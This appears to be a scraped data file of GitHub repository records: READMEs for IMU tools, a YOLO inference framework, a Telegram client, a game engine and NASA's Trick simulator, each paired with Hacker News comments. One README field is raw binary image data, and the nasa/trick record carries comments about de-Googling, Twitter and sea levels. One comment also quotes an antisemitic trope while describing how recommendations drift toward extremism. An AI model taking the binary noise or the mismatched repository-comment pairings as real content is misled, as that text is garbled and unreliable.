from the home page to the subscription page. Your recommendations will turn to whatever you have in your subscriptions, videos similar to what you're currently watching, and an occasional super popular video that will stay in your recommendations until you click on it. It's pretty bad, but it's still much better than the garbage it's serving you with the default settings. The YouTube recommendation system is optimized to direct all users toward pools of content that have the highest amount of watch time. The AI has learned about various paths that get users to watch for longer amounts of time. One of those paths is right-wing polemics. Another path is, say, makeup tutorials. It's not inherently political. Purely by its own machine learning, the YouTube algorithm becomes sophisticated at inching people toward the high-watchtime material. There is no malicious intent. There's no intent at all except for revenue. The AI doesn't \"know\" what the content of the reactionary videos even is. All it \"knows\" is that people who get there watch longer, and that people get there by way of other interests, such as martial arts, history, or guns. 
It also \"knows\" that this transition has to happen gradually to succeed. The recommendation progression is subtle:Martial arts -> combat -> guns/militaria -> liberals are coming to seize your gunsMartial arts -> combat -> guns/militaria -> look at this neat Nazi gun -> were the Nazis so wrong???Martial arts -> MMA -> Joe Rogan -> Jordan Peterson -> feminism is destroying Western civilizationMartial arts -> MMA -> Joe Rogan -> (((George Soros))) is a space reptileYour line of questioning assumes that this process is malfunctioning, when in fact it is working as intended. You're correct that it's ethically grotesque, but since when have companies ever taken responsibility for externalities without being compelled to via regulation? YouTube has the legal right to host and broadcast whatever (non-obscene, non-copyrighted) content makes it the most money. The only free-market answer would be advertisers pulling money, which they occasionally do as a disciplinary mechanism. But if the advertisers don't really care, well...I regularly get recommendations for extremist content on Youtube, even though it's not thematically related to anything I already watch. The most harmless ones are Jordan Peterson and Andrew Tate videos, but not too far behind is conspiracy stuff, fundamentalist religious channels, \"spiritual\" videos about faith and ghosts and living the Matrix. Like you, I used to click on the options to little effect, so now I just ignore them. It's actually a running joke with my friends that in the YT app on my iPad I often get an extremist suggestion exactly in the third slot of the suggested videos list.Here's my theory on why that happens: Youtube knows I'm male, kind of old, a tech nerd, and that I likely don't have any kids or a wife. That's it. It's the kind of content I'm supposed to like in my gender/age/status cohort.[flagged][flagged]I have seen this as well. What in the world is going on at Google?One thing to consider about the \"As far as I can tell those buttons aren\u2019t connected to anything on the back-end.\" idea is - if a new channel or video comes out, the algorithm might not know its undesirable to people in your cluster until enough unlucky people in your cluster is served that poor video recommendation and hits that button, at which point the ML has sufficient labels to start avoiding serving that video to people with similar preferences to you.But there's an endless amount of new content, and new content has a period before its properly labeled and sorted into the right filter bubbles, so you will likely never get to a world where you don't have to see that stuff.I have very nerdy and musical follows, no violence of any sort that I can think of other than the occasional snarky vlogger but even those tend to get pruned. I did find that the NI/DRTC method did help me to prune all political content - I do subscribe to one political show for sure because it's genuinely funny (even they rarely get much of a watch these days though), but with a concerted effort over a good week of daily instruction I got it to stop recommending all the talentless pandering pundits of the same stripe who desire my attention.The real concern is if Google really has accepted money from this channel in exchange for access to the feeds of people who are into violent content. To say that scenario is believable is an understatement, but to believe it is dark. I'd prefer not to.I had a chance to reflect on this overnight. I apologize that the initial rant was not written very well. 
I had to get it out and off my chest, but was multitasking to hit a parallel real-life deadline elsewhere. My personal answer to all of this is that YouTube is a failed product for me. It may serve some general consumption/ad revenue production use case, but it is a terrible product for a self-directed \u201cpower user.\u201d I see the situation as analogous to Twitter. The benefits of the platform are too powerful to entirely leave behind, but horribly deficient compared to what they could be, and there is no real alternative because of monopoly. YouTube, in my view, long ago stopped focusing on providing more value in a two-sided market between content consumers/creators and shifted to pure monopoly resource extraction. I\u2019m sure there are alternative emerging platforms, but the logic of natural monopolies in two-sided markets makes it brutally hard for any of them to reach critical useful scale. But I realize I\u2019ve gotten very lazy over the past decades and outsourced far too much power to the platform companies. Business is always some combination of providing value to your customers and extracting value for yourself, but too many of these platforms have lost the balance. I\u2019m tired of being the product even when I try to provide an alternative paid revenue stream to opt out of that deal. Annoying and painful as it will be (I\u2019m at a point in life where I no longer have bandwidth to self-hack everything), I am going to have to reclaim big chunks of my digital autonomy. Thanks all for the great discussion here. In-person meetups are good. Some of the online 'code and coffee' events also are good chances to do some networking. > What else should I try? Lowering your standards. Define your goals in networking. Get more specific with whom you want to meet and why. Find out where those people are spending time online and IRL. Determine how closely you are connected to them and if anyone you know can make an introduction. Go to conferences and do your best to have quality conversations with several people. Create content for the kind of people you want to meet. Make friends with someone who does network full time. People who are not engineers, basically. Make a Google spreadsheet[1] with the list of your old industry contacts. Research. Prioritize. Start calling/messaging them. Say you want to catch up. Either have a catch-up talk on the phone, and if they like it, set up a coffee meeting (coffee on you ;). Before COVID I networked a lot. This is how I am rebuilding my network. -- 1. It can be any CRM tool really, but better to keep it simple. Neat! The mix of (a) planning trips for groups of friends and (b) opening up trips to folks you don't know is nice. On a related note, I'm willing to personally act as a travel agent for a remote co-working trip among coworkers as a non-scalable way to grow the platform initially and get user feedback. If you're interested in exploring a fun 4-10 person trip with colleagues, email me at ben@villagersapp.com. I think you should change your demo trip; I clicked on it and got annoyed about how pedantic (for lack of a better word I can think of) the 'rules' were: Trip Rules\n No pets\n No parties\n Quiet after 11pm\n Alcohol allowed\n No drugs\n No marijuana allowed\n\nI mean, it is realistic for a yoga trip, but in a demo you'd want to showcase the most fun way to use this, not the most patronising way. Just wanted to say - this is well designed, clean interface, and fast (on my desktop). Well done, especially if you solo developed this. Interesting idea. 
When I tap \"Plan A Trip\", the box color highlights, but nothing happens, and I don't see a way to get beyond that page. Cool, there are def some things to do with nomad trips. Thinking of working online + doing an activity altogether like kitesurfing, skiing, scuba diving, freediving, paragliding, etc. Any other locations / dates that I could propose that would interest folks? I'm always fascinated by group travel apps, although I certainly haven't seen a successful uber-app for managing all aspects of a trip. I like the focus here on getting commitment from participants. That can be so challenging when putting together a trip. It doesn't look like Villagers handles everything (and that's ok!) - e.g. when I went to create a new trip I noticed it looks like everything is based on having a single location - you can't set up lodging in location A for the beginning of a trip, have a few days on the trail hiking, and the lodging for the end of the trip in location B (unless I missed it). EDIT: Oh, and it looks like the lodging HAS to be an AirBNB (the field validates that the AirBNB URL contains AirBNB.com). That's certainly limiting. This is always an interesting app idea to me, but after trying group trips a few ways with people, the most successful have been loosely coupled: pick a geographical location, pick some dates that overlap, plan your own trip, keep things decoupled. Then, just find times that you want to meet up. Just like regular life. For things that require coordination, like a camping/canoe trip, email works well. Link to demo page hijacked my \"back\" button; not a fan. Kudos on the site design; fast, responsive, clean. Are you able to tell us about your stack? Am I right in thinking that it's essentially Facebook Events but for traveling? This is a problem as old as time. Over a decade ago I saw startups from Stanford trying to tackle this. This is not an expert perspective, but I believe the market is too small to really make it worthwhile. As alluded to, people in their 30s/40s lean into their family, children's activities, etc. Why does the start date have to be at least 10 days in advance? I live in Vegas (technically Henderson) and I'd love to join for the climbing. What is your opinion on [0]? I disagree with him about \" My best guess is that a truly great consumer service needs to be something that is can be used every day. \" I use Wanderlog (YC19) almost every trip I do; a lot of my friends started using it after I recommended this tool. Yet it is kinda right - Wanderlog doesn't seem to be making big progress, although the pandemic is probably responsible for that. [0] https://blog.garrytan.com/travel-planning-software-the-most-... I'd love to be able to see other people's past trip itineraries to get ideas about what things I might want to add to my own itinerary and how to structure it. Looks awesome! I have also been working on a similar app in my free time. Looks like several people had this idea during covid, since we all miss that in-person interaction. My favorite tool for coordinating locations with people is What 3 Words: https://what3words.com/ The map of the world is split into 3x3 meter squares with a unique three-word ID for each, e.g.: twig.fleet.likely > Alcohol allowed > No drugs ??? > with verified identities (license or passport). Also, hope you've thought through storing personal info like passports and driving licences, mate. Not just for GDPR, but if you don't have liability insurance and a good legal team you are asking for trouble. 
Hope you don't get any data breaches! I don't really like climbing, but this app looks fun. Would be especially interested in trips with other founders. Good luck! Sounds like fun! I doubt the defense industry is a good place for a VC-funded start-up. Growth is hopefully pretty limited. But I've got to ask why? Sure, the world feels rocky at the moment: there's a war, energy prices are soaring, inflation, and we're all waiting for a recession we expect to happen. But that doesn't mean wars are going to be more frequent. I'm sure the defense sector has opportunities to make a good buck. But if you want to change the world, I doubt that's where it'll be happening. I am a Ukrainian but I haven't understood your question. The first video has some citation from the Bible, which means a no-go for me; the second link is something paywalled; only the third article is understandable. upd: Also I can understand your nickname, this is a famous military meme about Kilroy. Fwiw... I've seen that Steve Blank video on the Secret History of Sili Valley and highly recommend it. How does it compare with https://www.vcluster.com/, which is also available as open source? Amazing work Arjun & Anirudh! I know you have been working on this for a while! What has been your biggest lesson learned building such a sophisticated devtool? Congratulations Arjun & Anirudh! Excited to see tools for testing microservices early in the development lifecycle. Wish you the best of luck. One thing that maybe is just wooshing over my head, but how does persistence fit into this, at least as best practices? The way I understand this tool from the docs is that a request is duplicated to go to the baseline service A as well as service A' -- so service A on the `main` branch is actually serving the up-to-date code, while service A' has modifications that developers can quickly see either work or blow up. What happens if the change is a DB write change? Do both A and A' point to a primary prod DB, and if A' changes something that results in bugged data, wouldn't that screw up prod data? How do I go about accounting for that? Or am I just entirely misunderstanding the point of this tool? EDIT: I think I just bumped into my own answer within the docs -- \"Sandbox Resources.\" I see so far you have Mysql/Maria, SQS, and Rabbit plugins. What's next on the roadmap? Kafka/PgSQL soonish? :) This looks pretty dope. Is there documentation where one can understand the underlying concepts of such a tech? Congrats on the launch Anirudh! Can\u2019t believe we met in a random Uber years ago in Menlo Park. As someone who has built out a similar internal tool, one of the things I'm excited to see someone do is the route propagation technique. It's something I've evaluated adding to our internal solution as we rolled out a service mesh, but ultimately we manage routing in a different way under the hood. Either way, this notion of slices of environments being deployed for testing, with \"baseline\" or fallback environments being used otherwise, is the future of software development. It's a real boon for developers when rolled out effectively, and I've seen it scale massively at GoodRx. Congrats to the team. Wish you all tons of success!", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "CCNYRoboticsLab/imu_tools", "link": "https://github.com/CCNYRoboticsLab/imu_tools", "tags": [], "stars": 654, "description": "ROS tools for IMU devices", "lang": "C++", "repo_lang": "", "readme": "IMU tools for ROS\n=================\n\nOverview\n--------\n\nIMU-related filters and visualizers. 
The repository contains:\n\n* `imu_filter_madgwick`: a filter which fuses angular velocities,\n  accelerations, and (optionally) magnetic readings from a generic IMU\n  device into an orientation. Based on the work of [1].\n\n* `imu_complementary_filter`: a filter which fuses angular velocities,\n  accelerations, and (optionally) magnetic readings from a generic IMU\n  device into an orientation quaternion using a novel approach based on a\n  complementary fusion. Based on the work of [2].\n\n* `rviz_imu_plugin`: a plugin for rviz which displays `sensor_msgs::Imu` messages\n\n[1]: https://www.x-io.co.uk/open-source-imu-and-ahrs-algorithms/\n\n[2]: https://www.mdpi.com/1424-8220/15/8/19302\n\n\nInstalling\n----------\n\n### From binaries\n\nThis repo has been released into all current ROS1 and ROS2 distros. To install,\nsimply:\n\n    sudo apt-get install ros-<distro>-imu-tools\n\n### From source (ROS1)\n\n[Create a catkin workspace](https://wiki.ros.org/catkin/Tutorials/create_a_workspace)\n(e.g., `~/catkin_ws/`) and source the `devel/setup.bash` file.\n\nMake sure you have git installed:\n\n    sudo apt-get install git\n\nClone this repository into your catkin workspace (e.g., `~/catkin_ws/src`; use\nthe proper branch for your distro, e.g., `melodic`, `noetic`, ...):\n\n    git clone -b <branch> https://github.com/CCNYRoboticsLab/imu_tools.git\n\nInstall any dependencies using [rosdep](https://www.ros.org/wiki/rosdep).\n\n    rosdep install imu_tools\n\nCompile the stack:\n\n    cd ~/catkin_ws\n    catkin_make\n\n### From source (ROS2)\n\nFollow the steps from the ROS2 [Creating a\nworkspace](https://docs.ros.org/en/rolling/Tutorials/Workspace/Creating-A-Workspace.html)\ndocumentation, but instead of cloning the sample repo, clone the proper branch\nof this repo instead:\n\n    git clone -b <branch> https://github.com/CCNYRoboticsLab/imu_tools.git\n\n\nMore info\n---------\n\nAll nodes, topics and parameters are documented on [this repo's ROS wiki\npage](https://wiki.ros.org/imu_tools).\n\n\npre-commit formatting checks\n----------------------------\n\nThis repo has a [pre-commit](https://pre-commit.com/) check that runs in CI.\nYou can use this locally and set it up to run automatically before you commit\nsomething. 
To install, use pip:\n\n```bash\npip3 install --user pre-commit\n```\n\nTo run over all the files in the repo manually:\n\n```bash\npre-commit run -a\n```\n\nTo run pre-commit automatically before committing in the local repo, install the git hooks:\n\n```bash\npre-commit install\n```\n\nLicense\n-------\n\n* `imu_filter_madgwick`: currently licensed as GPL, following the original implementation\n\n* `imu_complementary_filter`: BSD\n\n* `rviz_imu_plugin`: BSD\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""},
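The complementary fusion described in the imu_tools entry above blends a high-frequency gyro path with a low-frequency accelerometer path. A minimal single-axis C++ sketch of that idea (illustrative only; the actual `imu_complementary_filter` node estimates a full orientation quaternion, and all names here are hypothetical):

```cpp
// Single-axis complementary-fusion sketch; illustrative only, not the
// actual imu_complementary_filter implementation (which is quaternion-based).
#include <cmath>
#include <iostream>

// Blend a gyro-integrated angle with an accelerometer-derived angle:
// the gyro term tracks fast motion, the accel term corrects slow drift.
double complementaryStep(double angle, double gyroRate, double accelAngle,
                         double dt, double alpha = 0.98) {
    return alpha * (angle + gyroRate * dt) + (1.0 - alpha) * accelAngle;
}

int main() {
    double pitch = 0.0;
    const double dt = 0.01; // 100 Hz IMU samples (hypothetical)
    for (int i = 0; i < 1000; ++i) {
        const double gyroRate = 0.0;                     // rad/s, pretend reading
        const double accelPitch = std::atan2(0.1, 0.98); // tilt from gravity vector
        pitch = complementaryStep(pitch, gyroRate, accelPitch, dt);
    }
    // With a stationary gyro, the estimate converges to the accel angle.
    std::cout << "fused pitch estimate: " << pitch << " rad\n";
    return 0;
}
```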
{"name": "msnh2012/Msnhnet", "link": "https://github.com/msnh2012/Msnhnet", "tags": ["yolov3", "yolov4", "yolov5", "pytorch", "inference-engine", "darknet", "jetson-nx", "mobilenetv2", "mobilenetyolo"], "stars": 654, "description": "\ud83d\udd25 (yolov3 yolov4 yolov5 unet ...) A mini PyTorch inference framework inspired by darknet.", "lang": "C++", "repo_lang": "", "readme": "(The README of this repository was extracted as raw binary PNG image data; no readable text could be recovered.)", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""},
", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TDesktop-x64/tdesktop", "link": "https://github.com/TDesktop-x64/tdesktop", "tags": [], "stars": 654, "description": "64Gram (unofficial Telegram Desktop)", "lang": "C++", "repo_lang": "", "readme": "# 64Gram \u2013 Based on [Telegram Desktop](https://github.com/telegramdesktop/tdesktop)\n\nThe source code is published under GPLv3 with an OpenSSL exception; the license is available [here][license].\n\n[![Preview of 64Gram][preview_image]][preview_image_url]\n\n## Project Goal\n\nProvide a Windows 64-bit build with some enhancements.\n\n~~Because the official Telegram Desktop does not provide a Windows 
64-bit build, [Project TDesktop x64](https://github.com/TDesktop-x64) aims to provide a native Windows x64 build (with a few enhancements) to everybody.~~\n\n## Roadmap\n\nNo Roadmap? Yes.\n\n## [Features](features.md)\n\n## Supported systems\n\nWindows 7 and above\n\nLinux 64-bit\n\nmacOS 10.12 and above\n\nThe latest version is available on the [Release](https://github.com/TDesktop-x64/tdesktop/releases) page.\n\n## Localization\n\nIf you want to translate this project, **Just Do It!**\n\nCreate a Pull Request: [Localization Repo](https://github.com/TDesktop-x64/Localization).\n\n**Here is a project [translation template](https://github.com/TDesktop-x64/Localization/blob/master/en.json).**\n\nYou can find a language ID in Telegram's log.txt\n\nFor example: `[2022.04.23 10:37:45] Current Language pack ID: de, Base ID: `\n\nYour language translation filename is then `de.json` or something like that.\n\n***Note: Ignore the base ID (base ID translation - work in progress)***\n\n## Build instructions\n\n* Windows [(32-bit)][win32] [(64-bit)][win64]\n* [macOS][mac]\n* [GNU/Linux using Docker][linux]\n\n## Links\n\n* [Official Telegram Channel](https://t.me/tg_x64)\n* [Official discussion group](https://t.me/tg_x64_chat)\n\n## Sponsors\n\nJetBrains\n\n[//]: # (LINKS)\n[license]: LICENSE\n[win32]: docs/building-win.md\n[win64]: docs/building-win-x64.md\n[mac]: docs/building-mac.md\n[linux]: docs/building-linux.md\n[preview_image]: https://github.com/TDesktop-x64/tdesktop/blob/dev/docs/assets/preview.png \"Preview of 64Gram Desktop\"\n[preview_image_url]: https://raw.githubusercontent.com/TDesktop-x64/tdesktop/dev/docs/assets/preview.png\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "FrictionalGames/HPL1Engine", "link": "https://github.com/FrictionalGames/HPL1Engine", "tags": [], "stars": 654, "description": "A real time 3D engine.", "lang": "C++", "repo_lang": "", "readme": "HPL1 Engine Source Code\n=======================\n\nYes, here it is at last: the Engine that made the Penumbra Series.\n\nRead through the TODO file for various known things that should be cleaned up / fixed.\n\nIncluded are project files for Xcode, Visual Studio 2003 and CMake (for Linux).\n\nContributing Code\n-----------------\nWe encourage everyone to contribute code to this project, so just sign up for a GitHub account, create a fork and hack away at the codebase. We will start an Open Source forum on the Frictional Games forums as a place to talk about changes and to submit patches from your forks.\n\nLicense Information\n-------------------\nAll code is under the GPL Version 3 license except for the \"tests\", which are included under the ZLIB license. All of the assets are licensed under the Creative Commons Attribution Share-Alike 3.0 license except for the CG shaders, which are under the ZLIB license. Please read the COPYING and LICENSE-* files for more information on terms of use.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nasa/trick", "link": "https://github.com/nasa/trick", "tags": [], "stars": 654, "description": "Trick Simulation Environment. Trick provides a common set of simulation capabilities and utilities to build simulations automatically.", "lang": "C++", "repo_lang": "", "readme": "
*(Trick logo; build status badges: Linux, macOS, Coverage)*\n\nThe Trick Simulation Environment, developed at the NASA Johnson Space Center, is a powerful simulation development framework that enables users to build applications for all phases of space vehicle development. Trick expedites the creation of simulations for early vehicle design, performance evaluation, flight software development, flight vehicle dynamic load analysis, and virtual/hardware in the loop training. Trick's purpose is to provide a common set of simulation capabilities that allow users to concentrate on their domain specific models, rather than simulation-specific functions like job ordering, input file processing, or data recording.\n\n| Install Guide | Tutorial | Documentation |\n| --- | --- | --- |\n| Follow the installation guide to properly configure Trick on your operating system. | Complete the tutorial to become familiar with the basics. | Visit the documentation for a more complete understanding of Trick. |\n\n| Related Projects | Frequently Asked Questions | How-To Guides |\n| --- | --- | --- |\n| View some of the many projects that use Trick. | Read some of the most frequently asked questions pertaining to Trick. | See a collection of how-to guides detailing common Trick processes. |\n\n| Developer Docs |\n| --- |\n| Read detailed documentation for various Trick internals and processes. |
\n\n---\n\nTrick is released under the NASA Open Source Agreement Version 1.3 [license](https://github.com/nasa/trick/blob/master/LICENSE).\n", "readme_type": "markdown", "hn_comments": "Did you explore what could be the reason behind this?\nIf it\u2019s about data ownership, try going with self-hosted solutions.This sounds like a classic \"it's not a technology problem and technology won't solve it\" situation. Synchronize by traditional human-to-human communication and then you both do your preferred method of self-organization independently. If you want to synchronize schedules asynchronously, a paper calendar on a wall in the house should work for that.If/when you do HASS, make sure that any device that she is affected by (save for the router/hotspot, I guess) can also be controlled and overridden manually with physical buttons without needing her to use a computer or smartphone. If she has any concern about data/privacy which play into this, respect that by self-hosting locally rather than offloading to google calendar et al.>Rob Joyce - NSA Director of Cybersecurity @NSA_CSDirector - Nov 6Former NSA or Intel community? Come on back! We now have a vacancy listing to fast track former employees back in. Check it out.*\n\n\nIs the NSA looking to employ ex Twitter and Facebook employees?Classic. I've been using similar methods for measurements of transmission delays in the research on different human-controlled variables (though, I've found difference equations more intuitive and easier to represent in code than Laplace transforms). It looks like different controlled variables have different transmission delays, where, eg. the spinal loops are very fast, brainstem-spinal longer, and cortico-spinal even longer, as if the nervous system was split into discrete layers.3.4 mm per year over the last thirty years. 1.1 feet per century.Meanwhile, the tide around here goes up and down five feet twice every day.I've always wondered, if all the ice melts, how much further up will the water go, or what is the maximum. iirc, it has gone up around 500 feet since the last ice age started receding, with most of that near the early stages.Wait why is Netflix on your list? How are Netflix and Alphabet/Google related?Glad to see de-googling picking up steam. Personally, I created a Google Keep clone PWA[1] to address what I was missing after cutting the google tumor out of my life. I hope to see more and more passion projects which respect privacy and are of equal utility to what google provides.[1] https://tinylist.appI went with a pretty straightforward approach at the time. I mostly de-Googled myself 3-4 years ago.I use Fastmail for email and calendar, DuckDuckGo & StartPage for searching, Firefox as a web browser, and a Synology NAS for storage over Google Drive.I use Google Drive / Docs / Sheets occasionally for collaborating. Most people aren't de-Googled so it's more of a hassle to ask them to use a different service. Additionally, I don't use Google services for anything particularly important so I don't mind if Google knows about it.Fastmail isn't the most private service out there, but it is an amazing service to use for email, calendar, contacts, file storage, and notes. It works with 1Password with masked emails [0].You can also use sieve [1] to fine tune your filter rules. I'm not aware of other email services that provide this (unless of course you are hosting your own).I've played with it a bit. 
You don't really need to do it because the interface they have can generate sieve code for you, but it's nice that it is an option.[0]: https://www.fastmail.com/1password/\n[1]: http://sieve.info/> Using Google on your device stores your location every time you turn it on. It stores your search history across all your devices in a separate database, meaning even if you were to delete said history on all your devices, Google would still have a record of it.All of this can easily be disabled on the setting page for your Google account? And, location history is off by default.Yes: https://mallocate.com/blog/removing-google/Some of these make very little sense. For example:\u2022 Google Images\u2014 Unsplash - Pexels - Simple Gallery ProFirst two are stock photo sites, last one is an Android app for browsing local pictures. Google Images is a search engine for images, which is covered by the \"Google Search\" section anyways. Perhaps you confused Google Images with Google Photos (which is missing from the list), but even then the alternatives don't make sense.I'm currently on with this.Got my own domain, starting to change over accounts to new email. My webservers are at home, my NAS is being built.I'm getting GrapheneOS because I love my PinePhones but can't quite use one exclusively yet.Youtube: Odysee (with an extension that auto redirects youtube to odysee if it exists for the video)\nI only use google for youtube (if the content isn't on odysee) and gmail.How are the gmail alternatives? Can I use my custom domain for free on any?\nHave self-hosting solutions come close to gmail with spam filters?Google locked me out of my gmail a while ago, luckily I had moved almost everything away from Google that was important. My recovery email is a defunct me.com address back from when I was an iToddler. So effectively, THEY de-Googled ME lol.I went through the process of de-Googling my life a few months ago after the announcement that the free tier of GAFYD was finally going away. I had been wanting to do the change for years but postponing it out of laziness, and that was the trigger that finally did it. (I know they backtracked on their decision, but I'm glad I ripped off the band-aid.)Here is the excruciating process I had to follow in more detail, in case it may help anyone else: https://jmmv.dev/2022/03/abandoning-gafyd.htmlHere are some of my additional recommendations:Analytics - GoatCounter, Counter.devKeyboard - Unexpected Keyboard (A very cool keyboard)Search - NeevaTranslate - LingvaSome notes on the post:- Protonmail as a company doesn\u2019t have a very stellar reputation. I recommend hosting an e-mail server by yourself, or just use providers like Disroot Mail- K9 Mail is an email client, not an email providerHeretic take on this: Block first, figure out later. This is how we approach most technical issues anyways.So take /etc/hosts or little snitch or whatever and hard block .google., googletagmanager etc. - all sorts of domains that you come across from google.Then, when you run into something that doesn't work, figure it out at that moment.I\u2019ve moved away from Chrome and Google Search. But I\u2019m struggling to move away from Gmail, especially since this email is linked to so many critical official accounts (bank, government agencies)Any solutions to make the transition easier outside of manually updating email everywhere?Also, what\u2019s the best alternative to Gmail currently that will support using my own domain name?>AppsNo. Stop using smartphones. 
GNU/Linux and FOSS only.forget Duckduckgo and replace it with* anyone from https://searx.space/ or\n* https://metager.org/i dont i just accepted my fateThe advice and practical suggestions of this post are great, but for those who claim to have a hard time leaving google behind regardless (without a major business or work obligation that makes it difficult), the drama is overblown. It's not only possible, it's also relatively easy. I use google for exactly four things: Two gmail addresses for random crap emails and obligatory sign-ups if I want some document (serious email goes to a protonmail address); a phone with Android built into it (invasive but meh, I keep my smartphone engagement to enough of a minimum that it isn't a huge invasion of privacy); Google maps for random addresses and youtube for music I seek (and later download anyway), which in any case can be used without signing in.That's it. The rest is easily superfluous for most personal uses and I suspect that claiming otherwise is pure self absorbed convenience-hunting.I have been quasi-DeGoogleified for nearly a decade.The main thing standing in my way is the family domain hosted by Google. There are few enough of us, not using it for anything but family stuff, that Google is letting us keep it for free. Though I have an account at that domain (since I'm the administrator), I don't use the domain anymore.Other than that, except for an occasional foray into YouTube and a !g search when DDG isn't satisfactory, I pretty much ignore Google. I'm still more entangled than I want to be, but better than I was.Is there any privacy benefit to using the \u2018Mail\u2019 app on an iPhone over installing the gmail app from google?For my WordPress site, I replace Google Analytics with Koko Analytics. It provides list visitor information. But, I really just care to see which pages are most popular.Totally agree. Anything Google is off limits. The only exception is open source Android that has been thoroughly scrubbed. I currently use e/OS.1. Ensure all docs/pics are backed up somewhere on a PC I own\n2. Discard smartphone\n3. Delete gmail account\n4. Enjoy a peaceful and productive life!When I started \"deGoogling\" myself a year ago, the first step was to stop using Gmail. When changing my registered e-mail address everywhere on the Internet there was one crucial bit that I completely overlooked: the owner/tech/billing/etc. contact records of a domain that I own. Many registrars send all regular communications to the e-mail address of the user account, not to those in the domain contact records, so I happily went on thinking I was entirely \"deGmailed\" once my Gmail inbox had dried up as planned. If I had somehow lost access to that old Gmail address before I realized my mistake, that domain would effectively no longer be mine.deGoogling is great, but I don't want any corporations to track me or have data about me, and unfortunately the alternatives to Google are usually not any better in this respect.They might, like DDG, promise not to track me and to respect my privacy, but as an ordinary user I have absolutely no way of verifying their claims.I don't trust Vimeo any more than YouTube. I don't trust Authy any more than Google Authenticator. FastMail is great, but I don't want it to have my email any more than Gmail. I don't trust Firefox any more than Chromium.Unfortunately the internet and computers in general were never designed to respect privacy and most corporations are happy to collect data on their users... 
and I'm pretty pessimistic on this changing much for the typical user... If anything it's only going to get worse as tracking technology becomes ever more sophisticated and omnipresent.That's not to say we shouldn't deGoogle. But we should be under no illusion that that alone will somehow magically make our online lives private.For maps, You should add Organic maps. People tend to like the UI more than OsmAnd.Personally, I use OsmAnd with custom map files for better address coverage: https://github.com/pnoll1/osmand_map_creation.Google Analytics -> Plausible.ioGoogle Drive -> Mega.nzi think those who go through all this hassle must value their data more than their time.most of these services are inferior to the google service imo. and many of these alternatives may leak or sell your data too.if you're paranoid then DTA. it's far better to hide in the crowd then to use some browser developed by 4 people with anime emojis on github.also, I trust google won't get hacked far more than the others.better solution would be to obfuscate your data as much as possible.Yes, with the following exceptions:- YouTube has content that I enjoy and isn't available elsewhere. I know that it stores my history but I find its recommendations and multi-device support good enough that I consider it worth it. (Also, FWIW, you can disable the history using [0], it also has an autodelete, though I don't use it)- I drive and in my region, nothing is good enough for driving directions aside from Google Maps. I've tried all the other major apps on iOS like TomTom, Sygic etc. but they just don't work well enough.- Again, while driving, I use Android Auto on a device dedicated to that purpose. It's also the only situation where I use Google's voice recognition. I do so because I speak English in my daily life (e.g. song titles) but my region is German-speaking (e.g. places/street names/business names/addresses) and I need to be able to use both while driving. Only Google Assistant/Android Auto can be configured to recognise two languages.[0]: https://myactivity.google.com/activitycontrols?settings=yout...Every google feature you replace with a paid feature is one step closer to the internet freezing over. You cut out the big (free to consumer/product) data farms and soon the internet experience becomes like Cable Tv, you pay for channels/features on-top of ISP access.I don't really have an argument against this happening, capitalism will force it if it's an option. It's worth noting the internet the millenials and gen x'ers built, the internet we grew up on, could be gone forever and we are seeing it start to go now. The free web might become an altogether unpleasant place.Google's data centres aren't the Borg hive-mind. They are the future glaciers that will be mined for knowledge and ideas much later on.iPhone, DDG, hosts.etc> you will appreciate not having ads targeted to you or your devices constantly connecting to transmit data to servers.Why would I appreciate seeing more generic ads?I'm using Tresorit instead of Drive since about one year. Working fine. So far not considering leaving that service.1. Bought a couple of personal domains and signed-up with Fastmail. Configured Fastmail to periodically pull emails from my legacy gmail account. I use the Fastmail webapp on desktop and their android app on phone/tablet.2. Removed google analytics from my personal website/blog.3. Uninstall Chrome on desktops and disable it on Android phone/tablet.4. 
Use Firefox with Multi Account Containers add-on so that I am by default signed-out of google unless I need to do specific things, which are sandboxed in specific tabs.5. Paid for Kagi search and set it as the default search provider on my desktops and devices.6. Migrated a few legacy accounts from Google oauth sign-in to email/password.Still to do:a. Migrate my calendars from Google to Fastmail. For various reasons I need to be able to share calendars on Google and I haven't had time to sort this out.b. Migrate off Google Photos. I take a lot of pics with my phone and google photos is just so convenient. I try to only keep six months of pictures on google and archive the rest to a machine that I own.c. Google Movies/TV. I have a fair amount of bought content, mainly because its convenient to stream on a tablet. Not sure what the solution is there.d. I still find google maps useful for a few things - particularly as a way to discover opening hours for businesses. My car has a built-in, non-android, GPS so I don't use google maps for driving.e. I still have an android phone and tablet, and I'm sure they're still phoning home about me.I moved to China and had to do it, then after returning back I really didn't miss their services, only Google apps in my phone without gapps are Gtranslate, which I really don't use and have it only just in case, sadly DeepL didn't have comparable app, I use also Gboard (with no internet access in firewall) since it's currently best swipe keyboard and that's it, everything else I use from other companies and find apps from Google inferior, I also use Google search but through my preferred browser (Kiwi in mobile, Vivaldi on desktop).Email - AquamailCalendar - Business calendar pro 1.*IM - Whatsapp (network effect sadly, otherwise I would go with Element, used for years Signal but was sick of horrible UX)Maps - Mapy.czSMS - Pulseapp store - Aurora store, I know I know it's cheating...2FA - AndOTPGallery - Simple gallery proBtw Duckduckgo is horrible shady search engine, you are better off even with Google or Bing, though Kagi, Searx and Brave Search are better.I've got a legacy free gsuite account with two domains, one is personal the other business. I never got the option to keep it free for personal use, but also since it's still in the 3rd week of transitioning from free, I have no support. Without human support I can't split out the business domain into its own paid workspaces account, the tools I have access to don't have the option.I have no motivation to de-Google except how horrible Google has been about this transition, so far making it impossible through circular logic.I guess I'd have to do a takeout of the business domain, then delete that domain. Then open a new workspaces account and import the takout. Then handwave magic, I somehow get Google's attention to get the personal workspaces free instead of just automatically shutoff as their support docs claim will happen. Since I might have to migrate this one domain to some other service anyway, I might as well move the other domain too because it's easier to manage the two domains with a single interface even if they are separate accounts. So yeah, Google themselves are the how I will deGoogle, seems like.Google forced my hand with their decision to punish Apps for your Domain users. I was so angry at the decision that I moved to iCloud+ Custom Domain and made DuckDuckGo my default search engine and switched to safari. I will never, 